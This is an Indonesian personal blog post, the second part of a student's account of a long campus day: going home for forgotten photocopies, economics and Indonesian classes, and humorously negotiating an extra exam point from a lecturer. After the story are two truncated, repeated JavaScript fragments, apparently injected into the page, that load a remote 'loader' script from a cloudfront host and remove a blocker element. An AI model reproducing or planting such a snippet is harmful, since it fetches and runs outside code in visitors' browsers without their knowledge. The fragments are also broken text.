The Longest Day Ever !! Part 2

Setelah menurunkannya, saya pun bergegas menuju rumah saya. Setelah sampai di rumah ibu saya pun bertanya mengapa saya sudah pulang. Saya menjawab “ada yang ketinggalan Bu..”. Ibu saya pun langsung memberikan KulTim ( kuliah tiga menit ) yang intinya menyuruh saya agar memeriksa semua barang bawaan saya sebelum berangkat agar tidak ada yang tertinggal.

Setelah saya mengambil semua paper saya pun mengirim pesan singkat kepada Sarlinda untuk menunggu saya di pasar minggu. Saya pun menuju pasar minggu untuk menghampiri Sarlinda. Untungnya Sarlinda mengenakan baju berwarna ungu sehingga sangat terlihat di tengah kerumunan pasar dan terik matahari. Setelah menemuinya kami pun bersama menuju kampus Depok.

30 menit berlalu kami sampai di kampus depok. Saya dan Sarlinda langsung menuju mesjid untuk menghampiri teman-teman yang sedang makan siang disana. Kami berdua pun langsung menyantap makan siang kami dan dilanjutkan sholat dzuhur. Setelah selesai sholat kami menuju kelas. Sesampainya di kelas, dosen pun tidak langsung datang. Dikelas, kami semua memakan cemilan bersama yaitu keripik pisang lampung yang dipropokatoro oleh Sarlinda.

Selang 20 menit kemudian dosen pun datang dan memberikan nilai hasil UTS kemarin dan meminta semua mahasiswa yang merasa nilainya kurang untuk mengerjakan selembar kertas yang berisi 10 soal. Dosen tersebut pun tidak sama sekali menyinggung tentang tugas yang minggu lalu ia berikan yaitu membawa semua fotocopy-an yang pernah ia berikan. Sebelumnya saya merasa perjuangan saya tadi yang pulang ke rumah untuk mengambil semua fotocopy-an adalah sia-sia, tetapi dikarenakan mengisi 10 soal tadi membuatuhkan untuk melihat fotocopy-an tersebut kelelahan saya sedikit terbayarkan.

Mata kuliah Teori Ekonomi pun berakhir, dan matkul Bahasa Indonesia pun bersambut. Saat-saat mendebarkan pun dimulai dikarenakan hasil UTS akan dibagikan oleh dosen. Ternyata hasil UTS bahasa Indonesia saya tidak memuaskan.

Dalam lembar jawaban saya, saya menemukan satu soal yang disalah totalkan oleh dosen. Saya pun merasa tidak terima dengan perlakuan dosen tersebut. Dengan keberanian penuh saya pun maju kedepan untuk mengkomplain hal tersebut. Setelah sampai dihadapan dosen terjadilah dialog singkat sebagai berikut.

Saya : Pak saya minta upah!

Dosen : Upah apa..?

Saya : Upah nulis. (#dalam hati : pake nanya lagi.. emangnya upah jajan..)

Dosen : Soal yang mana?

Saya : Yang no.2 nih pak.. tuh masa’ disalahin total sih?? saya kan capek nulisnya..

Dosen : Emang maunya berapa..?

Saya : Hmm… karena saya nulisnya banyak, saya minta 5 aja deh..

Dosen : Hah.,  banyak banget. Satu aja ya..

Saya : Kok satu sih pak,, kan saya udah capeh nulisnya pak..

Dosen : Yaudah nama kamu siapa?

Saya : Khairunnisa Fathin pak.

Tanpa saya sadari, ternyata teman-teman saya melihat kearah saya saat saya bernogisiasi dengan dosen. Dan setelah saya selesai bernegosiasi sontak semua teman yang memperhatikan saya tertawa karena tingakah saya. Mereka semua bertanya-tanya hasil tawar-menawar saya dengan dosen tadi. Saya pun menjawab “dapet kok 1 poin..”. Dengan penuh perjuangan saya pun mendapatkan tambahan nilai yaitu satu poin. Menurut saya hal itu lebih baik dari pada tidak sama sekali.

Setelah lama waktu berlalu mata kuliah bahasa Indonesia pun berakhir. Dikarenakan turunnya hujan yang cukup deras, terpaksa saya dan teman-teman sekelas menunggu hujan berhenti untuk pulang.

Ketika kami sedang menunggu hujan di kelas, pacar seorang teman saya yang bernama Lita bersama teman sekelasnya datang menghampiri Lita di kelas kami. Tidak lama kemudian hujan pun berhenti dan saya, Fani, Lita, Sarlinda, Agung (pacar Lita) dan Junior teman sekelasnya beranjak ke mesjid untuk menunaikan sholat ashar. Setelah sholat ashar kami pun berpisah dikarenakan arah pulang kami yang berbeda. (Bersambung ke The longest day ever Part 3)

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

Tinggalkan Balasan

